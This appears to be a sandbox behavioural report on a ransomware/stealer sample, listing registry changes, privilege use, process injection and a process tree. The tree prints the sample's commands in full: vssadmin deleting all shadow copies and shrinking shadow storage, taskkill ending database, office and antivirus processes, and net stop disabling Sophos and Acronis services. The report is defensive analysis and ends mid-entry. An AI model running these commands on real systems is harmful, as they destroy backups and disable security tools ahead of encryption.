Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2878641211-696417878-3864914810-1000\{CA5F39C0-B67F-443E-8953-66CE79D132BF}	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2878641211-696417878-3864914810-1000\{3AA1DEBF-EE01-4C88-B133-C95D72110E81}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
848	vVGbi.exe
848	vVGbi.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
848	vVGbi.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	4756	taskkill.exe
Token: SeDebugPrivilege	2332	taskkill.exe
Token: SeDebugPrivilege	3136	taskkill.exe
Token: SeDebugPrivilege	3788	taskkill.exe
Token: SeDebugPrivilege	1916	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	2508	taskkill.exe
Token: SeDebugPrivilege	1036	taskkill.exe
Token: SeDebugPrivilege	716	taskkill.exe
Token: SeDebugPrivilege	4764	taskkill.exe
Token: SeDebugPrivilege	3696	taskkill.exe
Token: SeDebugPrivilege	4064	taskkill.exe
Token: SeDebugPrivilege	1008	taskkill.exe
Token: SeDebugPrivilege	4828	taskkill.exe
Token: SeDebugPrivilege	3508	taskkill.exe
Token: SeDebugPrivilege	3832	taskkill.exe
Token: SeDebugPrivilege	2396	taskkill.exe
Token: SeDebugPrivilege	1300	taskkill.exe
Token: SeDebugPrivilege	4216	taskkill.exe
Token: SeDebugPrivilege	364	taskkill.exe
Token: SeDebugPrivilege	2400	taskkill.exe
Token: SeDebugPrivilege	228	taskkill.exe
Token: SeDebugPrivilege	4312	taskkill.exe
Token: SeDebugPrivilege	3452	taskkill.exe
Token: SeDebugPrivilege	3748	taskkill.exe
Token: SeDebugPrivilege	1184	taskkill.exe
Token: SeDebugPrivilege	2912	taskkill.exe
Token: SeDebugPrivilege	3296	taskkill.exe
Token: SeDebugPrivilege	452	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	2744	taskkill.exe
Token: SeDebugPrivilege	2900	taskkill.exe
Token: SeDebugPrivilege	2684	taskkill.exe
Token: SeDebugPrivilege	4532	taskkill.exe
Token: SeDebugPrivilege	2924	taskkill.exe
Token: SeDebugPrivilege	644	taskkill.exe
Token: SeDebugPrivilege	2336	taskkill.exe
Token: SeDebugPrivilege	1884	taskkill.exe
Token: SeDebugPrivilege	64	taskkill.exe
Token: SeDebugPrivilege	2712	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	848	vVGbi.exe
Token: SeShutdownPrivilege	3948	RuntimeBroker.exe
Token: SeShutdownPrivilege	3948	RuntimeBroker.exe
Token: SeBackupPrivilege	26608	vssvc.exe
Token: SeRestorePrivilege	26608	vssvc.exe
Token: SeAuditPrivilege	26608	vssvc.exe
Token: SeShutdownPrivilege	3876	explorer.exe
Token: SeCreatePagefilePrivilege	3876	explorer.exe
Token: SeShutdownPrivilege	3876	explorer.exe
Token: SeCreatePagefilePrivilege	3876	explorer.exe
Token: SeShutdownPrivilege	3876	explorer.exe
Token: SeCreatePagefilePrivilege	3876	explorer.exe
Token: SeShutdownPrivilege	3876	explorer.exe
Token: SeCreatePagefilePrivilege	3876	explorer.exe
Token: SeShutdownPrivilege	3876	explorer.exe
Token: SeCreatePagefilePrivilege	3876	explorer.exe
Token: SeShutdownPrivilege	3780	DllHost.exe
Token: SeCreatePagefilePrivilege	3780	DllHost.exe
Token: SeShutdownPrivilege	3876	explorer.exe
Token: SeCreatePagefilePrivilege	3876	explorer.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
26528	sihost.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe

Suspicious use of SendNotifyMessage 22 IoCs

pid	Process
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
3876	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe
23016	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4448	StartMenuExperienceHost.exe
12156	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1876 wrote to memory of 848	1876	2024-12-10_7bcbd03a264f616bcbf64dd973c9e120_luca-stealer_ryuk.exe	83
PID 1876 wrote to memory of 848	1876	2024-12-10_7bcbd03a264f616bcbf64dd973c9e120_luca-stealer_ryuk.exe	83
PID 848 wrote to memory of 2676	848	vVGbi.exe	214
PID 848 wrote to memory of 2676	848	vVGbi.exe	214
PID 848 wrote to memory of 4756	848	vVGbi.exe	86
PID 848 wrote to memory of 4756	848	vVGbi.exe	86
PID 848 wrote to memory of 2332	848	vVGbi.exe	324
PID 848 wrote to memory of 2332	848	vVGbi.exe	324
PID 848 wrote to memory of 3136	848	vVGbi.exe	706
PID 848 wrote to memory of 3136	848	vVGbi.exe	706
PID 848 wrote to memory of 3788	848	vVGbi.exe	511
PID 848 wrote to memory of 3788	848	vVGbi.exe	511
PID 848 wrote to memory of 2104	848	vVGbi.exe	422
PID 848 wrote to memory of 2104	848	vVGbi.exe	422
PID 848 wrote to memory of 1916	848	vVGbi.exe	499
PID 848 wrote to memory of 1916	848	vVGbi.exe	499
PID 848 wrote to memory of 2684	848	vVGbi.exe	155
PID 848 wrote to memory of 2684	848	vVGbi.exe	155
PID 848 wrote to memory of 1676	848	vVGbi.exe	249
PID 848 wrote to memory of 1676	848	vVGbi.exe	249
PID 848 wrote to memory of 2508	848	vVGbi.exe	584
PID 848 wrote to memory of 2508	848	vVGbi.exe	584
PID 848 wrote to memory of 716	848	vVGbi.exe	106
PID 848 wrote to memory of 716	848	vVGbi.exe	106
PID 848 wrote to memory of 4764	848	vVGbi.exe	596
PID 848 wrote to memory of 4764	848	vVGbi.exe	596
PID 848 wrote to memory of 1036	848	vVGbi.exe	685
PID 848 wrote to memory of 1036	848	vVGbi.exe	685
PID 848 wrote to memory of 3696	848	vVGbi.exe	338
PID 848 wrote to memory of 3696	848	vVGbi.exe	338
PID 848 wrote to memory of 4064	848	vVGbi.exe	713
PID 848 wrote to memory of 4064	848	vVGbi.exe	713
PID 848 wrote to memory of 1008	848	vVGbi.exe	618
PID 848 wrote to memory of 1008	848	vVGbi.exe	618
PID 848 wrote to memory of 3508	848	vVGbi.exe	370
PID 848 wrote to memory of 3508	848	vVGbi.exe	370
PID 848 wrote to memory of 4828	848	vVGbi.exe	684
PID 848 wrote to memory of 4828	848	vVGbi.exe	684
PID 848 wrote to memory of 1300	848	vVGbi.exe	694
PID 848 wrote to memory of 1300	848	vVGbi.exe	694
PID 848 wrote to memory of 2396	848	vVGbi.exe	125
PID 848 wrote to memory of 2396	848	vVGbi.exe	125
PID 848 wrote to memory of 4216	848	vVGbi.exe	668
PID 848 wrote to memory of 4216	848	vVGbi.exe	668
PID 848 wrote to memory of 3832	848	vVGbi.exe	579
PID 848 wrote to memory of 3832	848	vVGbi.exe	579
PID 848 wrote to memory of 364	848	vVGbi.exe	662
PID 848 wrote to memory of 364	848	vVGbi.exe	662
PID 848 wrote to memory of 2400	848	vVGbi.exe	277
PID 848 wrote to memory of 2400	848	vVGbi.exe	277
PID 848 wrote to memory of 228	848	vVGbi.exe	135
PID 848 wrote to memory of 228	848	vVGbi.exe	135
PID 848 wrote to memory of 4312	848	vVGbi.exe	702
PID 848 wrote to memory of 4312	848	vVGbi.exe	702
PID 848 wrote to memory of 3452	848	vVGbi.exe	664
PID 848 wrote to memory of 3452	848	vVGbi.exe	664
PID 848 wrote to memory of 3748	848	vVGbi.exe	480
PID 848 wrote to memory of 3748	848	vVGbi.exe	480
PID 848 wrote to memory of 1184	848	vVGbi.exe	143
PID 848 wrote to memory of 1184	848	vVGbi.exe	143
PID 848 wrote to memory of 2912	848	vVGbi.exe	703
PID 848 wrote to memory of 2912	848	vVGbi.exe	703
PID 848 wrote to memory of 452	848	vVGbi.exe	147
PID 848 wrote to memory of 452	848	vVGbi.exe	147

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Drops startup file
- Drops file in Program Files directory
- Modifies registry class
PID:2988
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:26484
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:26580
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1188
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:4604
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2384
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3904
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4512
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4216
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1008
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:720
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:11344
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:11380
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:11424
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:11496
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:11536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3064

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:3108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Drops startup file
- Drops file in Program Files directory
PID:3596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\users\Public\window.bat"
  2⤵
  PID:23216
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:23280
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:23440
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:23504
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:23540
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1520
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:3644
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:1800
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:4016
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:9500
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:9584
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:9720
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:9952
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:9980
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:10036

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:3948

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4040

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3920

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:4412

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4468

C:\Users\Admin\AppData\Local\Temp\2024-12-10_7bcbd03a264f616bcbf64dd973c9e120_luca-stealer_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-10_7bcbd03a264f616bcbf64dd973c9e120_luca-stealer_ryuk.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1876
- C:\users\Public\vVGbi.exe
  "C:\users\Public\vVGbi.exe" C:\Users\Admin\AppData\Local\Temp\2024-12-10_7bcbd03a264f616bcbf64dd973c9e120_luca-stealer_ryuk.exe
  2⤵
  - Checks computer location settings
  - Deletes itself
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:848
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4756
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2332
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3788
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2508
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:716
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1036
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3696
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4064
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1008
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3508
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4828
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1300
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2396
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4216
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3832
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:364
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:228
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3452
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3748
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2912
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:452
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3296
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1188
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4532
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2924
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:644
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2336
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1884
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2284
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:64
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
    3⤵
    PID:4424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
      4⤵
      PID:2380
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
    3⤵
    PID:400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Enterprise Client Service" /y
      4⤵
      PID:1976
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos Agent" /y
    3⤵
    PID:1908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Agent" /y
      4⤵
      PID:1592
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
    3⤵
    PID:4000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
      4⤵
      PID:2400
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
    3⤵
    PID:3180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Clean Service" /y
      4⤵
      PID:5064
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
    3⤵
    PID:3996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
      4⤵
      PID:1880
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
    3⤵
    PID:1824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
      4⤵
      PID:4996
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
    3⤵
    PID:4260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Health Service" /y
      4⤵
      PID:4808
- - C:\Windows\System32\net.exe
    "C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
    3⤵
    PID:3184
  - - C:\Windows\system32\net1.exe
